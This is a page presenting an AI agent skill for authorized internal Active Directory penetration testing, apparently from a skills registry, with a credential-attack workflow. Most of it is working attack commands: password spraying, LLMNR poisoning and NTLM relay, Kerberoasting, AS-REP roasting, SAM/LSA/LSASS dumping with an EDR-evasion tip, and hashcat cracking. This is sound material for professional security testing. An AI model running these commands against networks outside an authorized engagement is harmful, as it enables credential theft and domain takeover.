All skills
hardw00t avatar

/network-pentest

@f9bb3b2

Internal network and Active Directory penetration testing skill for corporate environments. Use when performing authorized internal network assessments, AD attack path analysis, lateral movement, privilege escalation, and post-exploitation across Windows/Linux estates. Covers BloodHound, Impacket, NetExec/CrackMapExec, Responder, Rubeus, mimikatz, certipy. Triggers on requests to pentest internal networks, attack AD, perform lateral movement, Kerberoast, DCSync, or escalate privileges.

Use this Skill: https://skilld.dev/gh/hardw00t/ai-security-arsenal/network-pentest

This session only. Nothing lands on disk.

workflowscredential_attacks.md

≈1.3k tokens on demand. Your agent reads this file only when SKILL.md points to it.

Workflow: Credential Attacks

Obtain/upgrade credential material via spraying, Kerberos roasting, coercion/relay, and hash extraction.

Preconditions

  • Recon complete; DC identified
  • Password policy known (from ad_enumeration.md step 1)
  • Authorization explicitly covers spraying and coercion

Safety-critical: lockout policy

Record BEFORE any spray:

  • LOCKOUT_THRESHOLD (bad-pwd count)
  • LOCKOUT_DURATION (minutes)
  • OBSERVATION_WINDOW (minutes) Cadence: attempts_per_account_per_window < LOCKOUT_THRESHOLD - 1.

A. Password spraying (MUST be sequential with delays)

Spraying is the one credential attack that cannot be parallelized per user. Each account's bad-pwd counter is shared — fan-out will cause lockouts.

# Single-pass with continue-on-success
nxc smb dc.corp.local -u users.txt -p 'Spring2026!' --continue-on-success \
  | tee spray.log

# Delayed per-user spray — safer, slower
for u in $(cat users.txt); do
  nxc smb dc.corp.local -u "$u" -p 'Spring2026!' --continue-on-success
  sleep 2
done

Candidate passwords (seasonal + company + derivatives):

  • Spring2026!, Summer2026!, <CompanyName>1!, <CompanyName>2026!
  • Welcome1, Password1!, Changeme123!

Kerbrute (pre-auth, much quieter — no SMB logons):

kerbrute passwordspray -d corp.local --dc dc.corp.local users.txt 'Spring2026!'

Dry-run first: test with a single non-business-critical account on the list to confirm you can read lockout counters.

B. LLMNR/NBT-NS/mDNS poisoning (parallelizable per interface)

# Edit Responder.conf: SMB = Off, HTTP = Off ONLY if planning NTLM relay
sudo responder -I eth0 -wdF              # default poisoning
sudo responder -I eth0 -wdF --wpad       # with WPAD

Relayed authentication (needs Responder's SMB/HTTP disabled):

sudo ntlmrelayx.py -tf smb_no_signing.txt -smb2support -socks
sudo ntlmrelayx.py -t ldaps://dc.corp.local --delegate-access \
  --escalate-user FAKE01\$

Generate the relay target list first — only hosts without SMB signing required:

nxc smb live.txt --gen-relay-list relay_targets.txt

Crack captured NTLMv2:

hashcat -m 5600 captured.ntlmv2 wordlists/rockyou.txt \
  -r rules/OneRuleToRuleThemAll.rule

C. Kerberoasting (parallelizable vs. unrelated attacks)

# Request TGS for every SPN user we can see
GetUserSPNs.py "$DOMAIN/$USER:$PASS" -dc-ip "$DC_IP" -request \
  -outputfile kerberoast.hash

# Or via NetExec
nxc ldap dc.corp.local -u "$USER" -p "$PASS" --kerberoasting kerberoast.hash

# Crack (13100 = Kerberos 5 TGS-REP etype 23)
hashcat -m 13100 kerberoast.hash wordlists/rockyou.txt \
  -r rules/OneRuleToRuleThemAll.rule

Target selection from BloodHound data: prefer users with pwdlastset > 180 days (likely weak, static passwords).

D. AS-REP Roasting

# No creds needed, just a userlist
GetNPUsers.py "$DOMAIN/" -dc-ip "$DC_IP" -usersfile users.txt \
  -format hashcat -outputfile asrep.hash -no-pass

# With creds — targets all DONT_REQ_PREAUTH users
GetNPUsers.py "$DOMAIN/$USER:$PASS" -dc-ip "$DC_IP" -request \
  -format hashcat -outputfile asrep.hash

# Crack (18200 = Kerberos 5 AS-REP etype 23)
hashcat -m 18200 asrep.hash wordlists/rockyou.txt

E. SAM / LSA extraction (when local admin already obtained)

# Single target
nxc smb target -u admin -p 'pass' --local-auth --sam --lsa
secretsdump.py -sam sam.bak -system system.bak -security security.bak LOCAL

# LSASS dump via lsassy
nxc smb target -u admin -p 'pass' -M lsassy

F. Hash cracking strategy

Hash Mode Strategy
NTLMv2 (Responder) 5600 rockyou + OneRuleToRuleThemAll
Kerberoast TGS etype 23 13100 rockyou + rules, then mask
AS-REP etype 23 18200 rockyou + rules
NTLM 1000 rockyou + rules + hashcat incremental
DCC2 (cached) 2100 rockyou (slow — limit to top 10M)
DPAPI masterkey 15300/15900 only when fast cracking hash is available

Parallelism summary

Stream Parallel? Notes
Different users, same password (spraying) NO Lockout-shared state
Different passwords, one user Serial w/ gap Respect observation window
Responder + Kerberoast + AS-REP Yes Independent primitives
Hash cracking across hashlists Yes Separate GPUs / hashcat instances

Safety hints

  • Never spray using the "break-glass" admin account on the userlist.
  • Keep spray.log — required for post-engagement lockout reconciliation with the customer.
  • Relay attacks (ntlmrelayx) can accidentally authenticate to production systems you don't own. Double-check the relay target list is in scope.
  • LSASS dumps may trigger EDR alerts; prefer lsassy with obfuscation or dump the process via comsvcs.dll MiniDump on the host.

Next workflows

  • Obtained local admin hash on a host: workflows/lateral_movement.md
  • Obtained service/user with DA path via BH: workflows/privilege_escalation.md

Source: SKILL.md on GitHub

1 alert16d4 checks · Risk SAFE
  • Gen Agent Trust Hub16d

    The network-pentest skill is a highly structured, well-documented resource designed for authorized internal network and Active Directory penetration testing workflows. It provides clear playbooks, references, and configuration templates for using industry-standard security tools. No malicious behaviors, obfuscation techniques, or unauthorized data exfiltration paths were detected.

  • Socket16d

    13 alerts: gptSecurity, gptAnomaly

  • Snyk16d

    Risk: LOW · No issues

  • Runlayer7mo

    1/1 file flagged

Signed by skilld at f9bb3b2. This ties the file your Agent reads to that commit on GitHub. It does not review the instructions.

Last checked against GitHub 2 months ago.

Steadyupdated 6 months ago

README badge

README badge for hardw00t/ai-security-arsenal/network-pentest